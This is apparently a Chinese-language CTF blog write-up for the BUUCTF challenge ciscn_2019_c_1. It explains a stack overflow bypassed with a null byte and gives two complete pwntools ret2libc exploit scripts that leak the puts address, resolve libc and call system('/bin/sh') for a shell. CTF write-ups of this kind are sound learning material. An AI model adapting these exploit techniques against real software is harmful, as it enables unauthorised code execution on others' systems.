ReStr0
Venom战队队员 Chamd5安全团队
ReStr0-Blog

BUUCTF ciscn_2019_c_1

查看保护状态

https://blog.restro.cn/wp-content/uploads/2021/08/image-13.png

打开ida查看发现不存在后门函数,这道题目也没有给我libc,那么这里借助写入ret2libc来实现getshell

题目给了是ubuntu18的版本,

https://blog.restro.cn/wp-content/uploads/2021/08/image-15.png

IDA中发现,存在一个栈溢出,并且看到了一个strlen 只需要放一个\0截断即可,这样我们输入的数据就不会被加密处理,(这里的加密方式只是简单的异或,异或两次也能恢复原来的值)

https://blog.restro.cn/wp-content/uploads/2021/08/image-14.png

在leak出来的数据前面有一些无效的字符,所以在接收puts地址的时候需要先recvline两次

EXP

(如果需要打远程,请使用LibcSearcher,否则请使用正确的libc版本)

from pwn import *

context(os="linux", arch="amd64", log_level="debug")
p = process("./ciscn_2019_c_1")
#p = remote("node4.buuoj.cn","28569")
elf = ELF("./ciscn_2019_c_1")


ret=0x4006b9
rdi=0x400c83
main=elf.sym['main']
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

p.recvuntil('choice!\n')
p.sendline('1')
payload='\0'+'a'*(0x50-1+8)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.recvuntil("encrypted\n")
p.sendline(payload)
#gdb.attach(p)
p.recvline()
p.recvline()
puts_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
print "puts is:"+hex(puts_addr)
#gdb.attach(p)
libc = ELF("./libc-2.27.so")
libc_base=puts_addr-libc.sym['puts']
system_addr=libc_base+libc.sym['system']
bin_sh=libc_base+next(libc.search("/bin/sh"))

print "libc_base is "+hex(libc_base)
print "system_addr is "+hex(system_addr)
print "str_bin_sh is "+hex(bin_sh)

payload1='\0'+'a'*(0x50-1+8)+p64(ret)+p64(rdi)+p64(bin_sh)+p64(system_addr)
p.sendlineafter("Input your choice!\n","1")
p.sendlineafter("Input your Plaintext to be encrypted\n",payload1)

p.interactive()

EXP2

另一种写法

from pwn import *
from LibcSearcher import *
# io = process('./ciscn_2019_c_1')
io = remote("node4.buuoj.cn","28569")
elf = ELF('./ciscn_2019_c_1')
# libc=ELF('./libc-2.27.so')
context.log_level='debug'


puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
pop_rdi_ret = 0x0000000000400c83
main_addr = 0x400B28
ret = 0x00000000004006b9


io.recvuntil('Input your choice!\n')
io.sendline('1')
io.recvuntil('Input your Plaintext to be encrypted\n')


payload='a'*(0x50+8)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
payload2=[]

def decrypt(content):
    for i in range(0,len(content)):
        if(ord(content[i])<=96 or ord(content[i])>122):
            if(ord(content[i])<=64 or ord(content[i])>90):
                if(ord(content[i])>47 or ord(content[i])<=57):
                    payload2.append(ord(content[i])^0xf)
                    continue
            else:
                payload2.append(ord(content[i])^0xe)
                continue
        else:
            payload2.append(ord(content[i])^0xd)
            continue
decrypt(payload)
payload2 = bytearray(payload2)

print "payload2----->" + payload2
# pause()


io.sendline(payload)
io.recvuntil('\x40\x0a')#@C
puts_addr = u64(io.recv(6).ljust(8,'\x00'))
libc = LibcSearcher('puts',puts_addr)
# libc_base = puts_addr - libc.sym['puts']
libc_base = puts_addr - libc.dump('puts')

print "libc_base----->" + hex(libc_base)
# system=libc.sym['system']
system=libc.dump('system')

binsh = libc
system_addr = libc_base+system
binsh_addr = libc_base+libc.dump('str_bin_sh')
# binsh_addr=next(libc.search("/bin/sh"))+libc_base

payload = 'a'*(0x50+8)+p64(ret)+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)
io.recvuntil('Input your choice!\n')
io.sendline('1')
io.recvuntil('Input your Plaintext to be encrypted\n')
# gdb.attach(io,'b *0x400AE8')
io.sendline(payload)

io.interactive()

发表评论

textsms
account_circle
email

ReStr0-Blog

BUUCTF ciscn_2019_c_1
查看保护状态 打开ida查看发现不存在后门函数,这道题目也没有给我libc,那么这里借助写入ret2libc来实现getshell 题目给了是ubuntu18的版本, IDA中发现,存在一个栈溢…
扫描二维码继续阅读
2021-08-06